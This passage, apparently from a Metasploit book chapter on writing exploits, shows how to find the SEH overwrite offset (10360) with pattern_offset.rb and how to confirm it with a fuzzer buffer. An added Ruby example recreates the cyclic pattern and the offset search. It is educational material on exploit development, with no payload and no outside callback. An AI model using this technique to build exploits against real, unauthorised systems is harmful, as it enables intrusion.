Creating Your Own Exploits 203
With the SEH overwritten with our random set of characters, we can use pattern_offset.rb in /opt/metasploit3/msf3/tools/ to determine exactly where the overwrite occurs by passing the characters of interest (684E3368) followed by the length of the string that was sent to the target (11000), as shown here:
root@bt:~/.msf3/modules/auxiliary/fuzzers# /opt/metasploit3/msf3/tools/pattern_offset.rb 684E3368 11000
10360
The value 10360 means that the four bytes that overwrite SEH are 10361, 10362, 10363, and 10364. We can now change the fuzzer code one last time to verify our findings:
print_status("Generating fuzzed data...")
fuzzed = "\x41" * 10360
fuzzed << "\x42" * 4
fuzzed << "\x43" * 636
print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
As shown, the fuzzer will build the malicious request beginning with 10,360 As (hexadecimal 41), followed by four Bs (hexadecimal 42) to overwrite the SEH, and then 636 Cs (hexadecimal 43) as filler to keep the string length constant at 11,000 bytes.
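As an added example, not the book's or Metasploit's own code: a small Ruby reimplementation of the cyclic pattern and the offset search that pattern_offset.rb performs, which reproduces the 10360 result above and then rebuilds the verification buffer. The names pattern_create, pattern_offset and seh_probe are assumptions for this example.

```ruby
# Added example (not the book's pattern_offset.rb): reimplements the cyclic
# pattern Metasploit uses and the offset search, then rebuilds the
# verification buffer from the text. Assumed names: pattern_create,
# pattern_offset, seh_probe.

# Generate `length` bytes of the Metasploit-style cyclic pattern
# ("Aa0Aa1Aa2...Ab0..."): every 4-byte window is unique for up to 20280 bytes.
def pattern_create(length)
  out = +""
  ('A'..'Z').each do |u|
    ('a'..'z').each do |l|
      ('0'..'9').each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length] # pattern exhausted before reaching the requested length
end

# Locate where a value seen in a register or SEH record lands in the pattern.
# The debugger shows the dword as 684E3368, but it was read from little-endian
# memory, so the bytes are reversed before searching; the straight byte order
# is tried as a fallback, as pattern_offset.rb does.
def pattern_offset(hex_value, length)
  pattern = pattern_create(length)
  bytes = [hex_value].pack('H*')
  [bytes.reverse, bytes].each do |needle|
    idx = pattern.index(needle)
    return idx if idx
  end
  nil
end

# Build the verification buffer from the text: A * offset, B * 4 to land in
# the SEH record, then C filler so the total length stays constant.
def seh_probe(offset, total = 11000)
  fuzzed = "\x41" * offset
  fuzzed << "\x42" * 4
  fuzzed << "\x43" * (total - offset - 4)
  fuzzed
end

if __FILE__ == $0
  off = pattern_offset("684E3368", 11000)
  puts "SEH overwrite offset: #{off}" # 10360
  buf = seh_probe(off)
  puts "buffer length: #{buf.length}, SEH bytes: #{buf[off, 4].inspect}"
end
```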
Running the fuzzer against the target again shows that the entire SEH
chain is under your complete control, as shown in Figure 14-4.
Figure 14-4: SEH fully controlled